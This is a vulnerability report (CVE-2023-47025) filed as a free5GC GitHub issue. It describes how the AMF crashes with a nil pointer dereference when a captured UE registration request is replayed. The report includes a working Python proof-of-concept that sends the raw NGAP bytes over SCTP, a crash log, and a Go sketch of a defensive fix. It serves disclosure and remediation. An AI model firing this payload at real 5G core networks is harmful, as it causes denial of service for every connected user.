CVE-2023-47025: [Bugs] Amf crashed when failed to resolve the IP of ngap message, resulting in a null pointer reference. · Issue #501 · free5gc/free5gc

An issue in Free5gc v.3.3.0 allows a local attacker to cause a denial of service via the free5gc-compose component.


Describe the bug

When I try to send a captured UE registration request message to the AMF, the log shows ‘sctp accept from ,’ and the AMF crashes, causing disconnection for other UEs as well.

To Reproduce

Steps to reproduce the behavior:

  1. Using free5gc-compose to establish the AMF.
  2. Run free5gc with default config.
  3. Run the following PoC Python script:

     ```python
     import sys, sctp, socket

     if len(sys.argv) != 2:
         print("Usage: free5gc.py server-address")
         sys.exit(0)

     # One-to-one SCTP socket to the AMF's NGAP port (38412)
     sk = sctp.sctpsocket_tcp(socket.AF_INET)
     sk.connect((sys.argv[1], 38412))
     # Captured UE registration request, sent as-is
     ue_request = b'\x00\x0f\x40\x48\x00\x00\x05\x00\x55\x00\x02\x00\x01\x00\x26\x00\x1a\x19\x7e\x00\x41\x79\x00\x0d\x01\x02\xf8\x39\x00\x00\x00\x00\x00\x00\x00\x00\x30\x2e\x04\xf0\xf0\xf0\xf0\x00\x79\x00\x13\x50\x02\xf8\x39\x00\x00\x00\x01\x00\x02\xf8\x39\x00\x00\x01\xe8\xe8\x7e\xd4\x00\x5a\x40\x01\x18\x00\x70\x40\x01\x00'
     # PPID 60 identifies the payload as NGAP
     sk.sctp_send(ue_request, ppid=socket.htonl(60))

     sk.close()
     ```

Expected behavior

I have sent the registration request of a UE that has already completed registration, so the expected behavior should be a notification that the user is already registered and a rejection of the request. However, the AMF crashed.

Screenshots

Environment (please complete the following information):

  • free5GC Version: v3.3.0
  • OS: Ubuntu 20.04.1 live-server
  • Kernel version: 5.4.0-165-generic

Trace File

Configuration File

Use the default config file.

PCAP File

crash.zip

Log File

```
amf | 2023-10-29T11:42:37.467203444Z [INFO][AMF][Ngap] [AMF] SCTP Accept from: <nil>
amf | 2023-10-29T11:42:37.467906401Z [FATA][AMF][Ngap] panic: runtime error: invalid memory address or nil pointer dereference
amf | goroutine 137 [running]:
amf | runtime/debug.Stack()
amf | /usr/local/go/src/runtime/debug/stack.go:24 +0x65
amf | github.com/free5gc/amf/internal/ngap/service.handleConnection.func1()
amf | /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:184 +0x58
amf | panic({0xbb3280, 0x13088a0})
amf | /usr/local/go/src/runtime/panic.go:1038 +0x215
amf | github.com/free5gc/amf/internal/ngap.Dispatch({0xdf2988, 0xc0001ec020}, {0xc0008ce000, 0x40000, 0x40000})
amf | /go/src/free5gc/NFs/amf/internal/ngap/dispatcher.go:19 +0xac
amf | github.com/free5gc/amf/internal/ngap/service.handleConnection(0xc0001ec020, 0x40000, {0xd03d48, 0xd03d58, 0xd03d50})
amf | /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:237 +0x417
amf | created by github.com/free5gc/amf/internal/ngap/service.listenAndServe
amf | /go/src/free5gc/NFs/amf/internal/ngap/service/service.go:158 +0x9fe
n3iwf | 2023-10-29T11:42:37.490422713Z [WARN][N3IWF][NGAP] [SCTP] Close connection.
n3iwf | 2023-10-29T11:42:37.490494299Z [INFO][N3IWF][NGAP] NGAP receiver stopped
n3iwf | 2023-10-29T11:42:37.490506087Z [INFO][N3IWF][NGAP] NGAP server stopped
ueransim | [2023-10-29 11:42:37.490] [sctp] [debug] SCTP association shutdown (clientId: 2)
ueransim | [2023-10-29 11:42:37.491] [sctp] [warning] Unhandled SCTP notification received
ueransim | [2023-10-29 11:42:37.491] [ngap] [error] Association terminated for AMF[2]
ueransim | [2023-10-29 11:42:37.491] [ngap] [debug] Removing AMF context[2]
```

Additional context

This security issue could allow anyone to send a message that would cause an AMF denial of service and severely affect other users.
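The log above shows `SCTP Accept from: <nil>` followed by a nil pointer dereference inside `ngap.Dispatch`. The Go sketch below is an added example, not free5gc's code and not its actual fix: it shows the defensive pattern for that failure mode, on the assumption that the crash comes from using a connection whose remote address is nil. `SafeDispatch`, `fakeConn`, `sctpAddr` and `ErrNoPeerAddr` are hypothetical names, and the connections are constructed test doubles.

```go
package main

import (
	"errors"
	"fmt"
	"net"
)

// ErrNoPeerAddr: the transport could not report who is on the other end.
var ErrNoPeerAddr = errors.New("ngap: connection has no remote address")

// sctpAddr is a constructed address type; String panics on a nil receiver.
type sctpAddr struct{ hostport string }

func (a *sctpAddr) Network() string { return "sctp" }
func (a *sctpAddr) String() string  { return a.hostport }

// fakeConn is a constructed stand-in for an accepted association.
type fakeConn struct {
	net.Conn
	remote net.Addr
}

func (c fakeConn) RemoteAddr() net.Addr { return c.remote }

// SafeDispatch (hypothetical) resolves the peer before touching per-peer state.
func SafeDispatch(conn net.Conn, msg []byte, peers map[string]int) (err error) {
	// A panic in one association's handler becomes an error, not a process exit.
	defer func() {
		if r := recover(); r != nil {
			err = fmt.Errorf("ngap: handler panic contained: %v", r)
		}
	}()
	if conn == nil || conn.RemoteAddr() == nil {
		return ErrNoPeerAddr // the "Accept from: <nil>" case
	}
	if len(msg) == 0 {
		return errors.New("ngap: empty message")
	}
	// A typed-nil address passes the check above; String() then panics.
	peers[conn.RemoteAddr().String()]++
	return nil
}

func main() {
	peers := map[string]int{}
	fmt.Println(SafeDispatch(fakeConn{remote: &sctpAddr{"10.0.0.5:38412"}}, []byte{0}, peers), peers)
	fmt.Println(SafeDispatch(fakeConn{}, []byte{0}, peers))
	fmt.Println(SafeDispatch(fakeConn{remote: (*sctpAddr)(nil)}, []byte{0}, peers))
}
```

Returning an error lets the caller close only the offending association, so other gNBs and UEs stay connected.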

Related news

GHSA-q27h-hw2v-x5jm: Free5gc allows a local attacker to cause a denial of service via the free5gc-compose component
